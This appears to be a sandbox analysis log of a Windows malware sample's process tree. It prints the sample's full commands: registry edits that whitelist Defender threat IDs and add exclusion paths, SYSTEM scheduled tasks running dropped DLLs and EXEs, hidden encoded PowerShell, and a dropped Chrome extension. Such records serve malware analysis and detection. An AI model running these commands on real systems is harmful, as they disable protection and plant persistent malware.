C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:980
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4068
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CsUgOGApU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VQnigEewLHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YXRVthYkCAsAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eBaLNwdfBoAU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\feaAGXZTPHSTZufvckR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dHiLAKBZJoSzXVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rlXICvrLwbHDFviC\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:64 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:323⤵PID:876
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:324⤵PID:2172
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CsUgOGApU" /t REG_DWORD /d 0 /reg:643⤵PID:3588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:323⤵PID:3520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VQnigEewLHUn" /t REG_DWORD /d 0 /reg:643⤵PID:1892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:323⤵PID:2232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YXRVthYkCAsAC" /t REG_DWORD /d 0 /reg:643⤵PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:323⤵PID:4036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eBaLNwdfBoAU2" /t REG_DWORD /d 0 /reg:643⤵PID:3604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:323⤵PID:4632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\feaAGXZTPHSTZufvckR" /t REG_DWORD /d 0 /reg:643⤵PID:3136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:323⤵PID:2472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dHiLAKBZJoSzXVVB /t REG_DWORD /d 0 /reg:643⤵PID:2560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:323⤵PID:3760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xRtgFInzQjbmwkgAI /t REG_DWORD /d 0 /reg:643⤵PID:2980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:323⤵PID:4256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rlXICvrLwbHDFviC /t REG_DWORD /d 0 /reg:643⤵PID:468
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghyainqyG" /SC once /ST 04:33:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghyainqyG"2⤵PID:5044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghyainqyG"2⤵PID:3080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TVsECgUtwDhLZifMW" /SC once /ST 07:01:13 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\ItpoQEL.exe\" I3 /UNsite_idKvf 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TVsECgUtwDhLZifMW"2⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5072
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:628
-
C:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\ItpoQEL.exeC:\Windows\Temp\rlXICvrLwbHDFviC\PquTZmovzMTprHT\ItpoQEL.exe I3 /UNsite_idKvf 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4304 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bHNJINcAmGBfsLXkXG"2⤵PID:924
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4896
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2116
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CsUgOGApU\lnVxuW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jHYEWeDFllXYdol" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jHYEWeDFllXYdol2" /F /xml "C:\Program Files (x86)\CsUgOGApU\CtbBkhG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3752
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jHYEWeDFllXYdol"2⤵PID:4396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jHYEWeDFllXYdol"2⤵PID:1148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "opRoyIfSGoYQul" /F /xml "C:\Program Files (x86)\eBaLNwdfBoAU2\xcwGnuu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ipVEcCYbpTyEb2" /F /xml "C:\ProgramData\dHiLAKBZJoSzXVVB\vVPhEJa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NdTWWpscfLExPZKYg2" /F /xml "C:\Program Files (x86)\feaAGXZTPHSTZufvckR\OLbrNxw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "auFylssPRYUhOjCZxxH2" /F /xml "C:\Program Files (x86)\YXRVthYkCAsAC\McnNYQE.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IypqguOSOyxhMfXuI" /SC once /ST 10:25:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\rlXICvrLwbHDFviC\qrPPHiDR\tWzaHlO.dll\",#1 /mVsite_idkBO 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "IypqguOSOyxhMfXuI"2⤵PID:2820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TVsECgUtwDhLZifMW"2⤵PID:316
-
-
